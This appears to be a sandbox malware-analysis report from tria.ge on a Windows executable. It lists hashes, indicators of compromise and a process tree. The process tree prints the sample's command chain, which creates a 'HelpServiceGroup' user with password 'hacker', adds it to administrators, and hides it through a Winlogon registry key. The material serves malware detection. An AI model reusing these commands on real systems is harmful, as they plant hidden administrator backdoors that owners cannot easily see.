Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
7s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
19/09/2022, 11:34
Static task
static1
Behavioral task
behavioral1
Sample
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe
Resource
win10v2004-20220812-en
General
-
Target
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe
-
Size
196KB
-
MD5
9a9bc53a852924cc6a0b2773f4924515
-
SHA1
99f6ed6b5d066fc675262054d379db6d1e92d84d
-
SHA256
791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
-
SHA512
1d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
SSDEEP
6144:CGHx7NOZxelAjG503Kx7+RMvC1QNXs4qAldlU6DyxD6QPB4d:lNOZclAjG503Kx7+RMvC1QZs4qAldlU6
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\services.exe 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe File opened for modification C:\Windows\SysWOW64\drivers\services.exe 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe File created C:\Windows\SysWOW64\drivers\services.exe services.exe -
Executes dropped EXE 2 IoCs
pid Process 1944 services.exe 1360 services.exe -
Loads dropped DLL 4 IoCs
pid Process 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 1944 services.exe 1944 services.exe -
Modifies WinLogon 2 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\HelpServiceGroup = "0" 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\HelpServiceGroup = "0" services.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\ 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe -
Runs net.exe
-
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 1944 services.exe 1944 services.exe 1944 services.exe 1360 services.exe 1360 services.exe 1360 services.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2000 wrote to memory of 2040 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 28 PID 2000 wrote to memory of 2040 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 28 PID 2000 wrote to memory of 2040 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 28 PID 2000 wrote to memory of 2040 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 28 PID 2040 wrote to memory of 1988 2040 cmd.exe 30 PID 2040 wrote to memory of 1988 2040 cmd.exe 30 PID 2040 wrote to memory of 1988 2040 cmd.exe 30 PID 2040 wrote to memory of 1988 2040 cmd.exe 30 PID 1988 wrote to memory of 956 1988 net.exe 31 PID 1988 wrote to memory of 956 1988 net.exe 31 PID 1988 wrote to memory of 956 1988 net.exe 31 PID 1988 wrote to memory of 956 1988 net.exe 31 PID 2000 wrote to memory of 1944 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 32 PID 2000 wrote to memory of 1944 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 32 PID 2000 wrote to memory of 1944 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 32 PID 2000 wrote to memory of 1944 2000 791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe 32 PID 1944 wrote to memory of 800 1944 services.exe 33 PID 1944 wrote to memory of 800 1944 services.exe 33 PID 1944 wrote to memory of 800 1944 services.exe 33 PID 1944 wrote to memory of 800 1944 services.exe 33 PID 1944 wrote to memory of 1360 1944 services.exe 35 PID 1944 wrote to memory of 1360 1944 services.exe 35 PID 1944 wrote to memory of 1360 1944 services.exe 35 PID 1944 wrote to memory of 1360 1944 services.exe 35 PID 800 wrote to memory of 1796 800 cmd.exe 36 PID 800 wrote to memory of 1796 800 cmd.exe 36 PID 800 wrote to memory of 1796 800 cmd.exe 36 PID 800 wrote to memory of 1796 800 cmd.exe 36 PID 1796 wrote to memory of 1216 1796 net.exe 37 PID 1796 wrote to memory of 1216 1796 net.exe 37 PID 1796 wrote to memory of 1216 1796 net.exe 37 PID 1796 wrote to memory of 1216 1796 net.exe 37 PID 1360 wrote to memory of 1660 1360 services.exe 38 PID 1360 wrote to memory of 1660 1360 services.exe 38 PID 1360 wrote to memory of 1660 1360 services.exe 38 PID 1360 wrote to memory of 1660 1360 services.exe 38 PID 2040 wrote to memory of 1732 2040 cmd.exe 40 PID 2040 wrote to memory of 1732 2040 cmd.exe 40 PID 2040 wrote to memory of 1732 2040 cmd.exe 40 PID 2040 wrote to memory of 1732 2040 cmd.exe 40 PID 1660 wrote to memory of 1212 1660 cmd.exe 42 PID 1660 wrote to memory of 1212 1660 cmd.exe 42 PID 1660 wrote to memory of 1212 1660 cmd.exe 42 PID 1660 wrote to memory of 1212 1660 cmd.exe 42 PID 1732 wrote to memory of 1540 1732 net.exe 41 PID 1732 wrote to memory of 1540 1732 net.exe 41 PID 1732 wrote to memory of 1540 1732 net.exe 41 PID 1732 wrote to memory of 1540 1732 net.exe 41 PID 1212 wrote to memory of 1520 1212 net.exe 43 PID 1212 wrote to memory of 1520 1212 net.exe 43 PID 1212 wrote to memory of 1520 1212 net.exe 43 PID 1212 wrote to memory of 1520 1212 net.exe 43 PID 2040 wrote to memory of 836 2040 cmd.exe 44 PID 2040 wrote to memory of 836 2040 cmd.exe 44 PID 2040 wrote to memory of 836 2040 cmd.exe 44 PID 2040 wrote to memory of 836 2040 cmd.exe 44 PID 836 wrote to memory of 824 836 net.exe 45 PID 836 wrote to memory of 824 836 net.exe 45 PID 836 wrote to memory of 824 836 net.exe 45 PID 836 wrote to memory of 824 836 net.exe 45 PID 2040 wrote to memory of 564 2040 cmd.exe 46 PID 2040 wrote to memory of 564 2040 cmd.exe 46 PID 2040 wrote to memory of 564 2040 cmd.exe 46 PID 2040 wrote to memory of 564 2040 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe"C:\Users\Admin\AppData\Local\Temp\791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Modifies WinLogon
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\cmd.execmd /c net user HelpServiceGroup hacker /add && net localgroup administrators HelpServiceGroup /add && net localgroup users HelpServiceGroup /delete && net user HelpServiceGroup /expires:never /passwordchg:no2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup hacker /add3⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup hacker /add4⤵PID:956
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators HelpServiceGroup /add3⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators HelpServiceGroup /add4⤵PID:1540
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup users HelpServiceGroup /delete3⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users HelpServiceGroup /delete4⤵PID:824
-
-
-
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup /expires:never /passwordchg:no3⤵PID:564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup /expires:never /passwordchg:no4⤵PID:1404
-
-
-
-
C:\Windows\SysWOW64\drivers\services.exeC:\Windows\system32\drivers\services.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies WinLogon
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\cmd.execmd /c net user HelpServiceGroup hacker /add && net localgroup administrators HelpServiceGroup /add && net localgroup users HelpServiceGroup /delete && net user HelpServiceGroup /expires:never /passwordchg:no3⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup hacker /add4⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup hacker /add5⤵PID:1216
-
-
-
-
C:\Windows\SysWOW64\drivers\services.exeC:\Windows\system32\drivers\services.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\cmd.execmd /c net user HelpServiceGroup hacker /add && net localgroup administrators HelpServiceGroup /add && net localgroup users HelpServiceGroup /delete && net user HelpServiceGroup /expires:never /passwordchg:no4⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\net.exenet user HelpServiceGroup hacker /add5⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpServiceGroup hacker /add6⤵PID:1520
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19
-
Filesize
196KB
MD59a9bc53a852924cc6a0b2773f4924515
SHA199f6ed6b5d066fc675262054d379db6d1e92d84d
SHA256791340a65a6bd8f73fb6a02edb244b45fb8719c5c872f1ea45af262ac78e1a7f
SHA5121d161a1d4f4ad9430a65e5bdb89846b9154366a4aecffffc354e18904de9af89e4577d2b71ce21dbe3238ee0c104325989aefec65cf915d76e4a0bd9f9432d19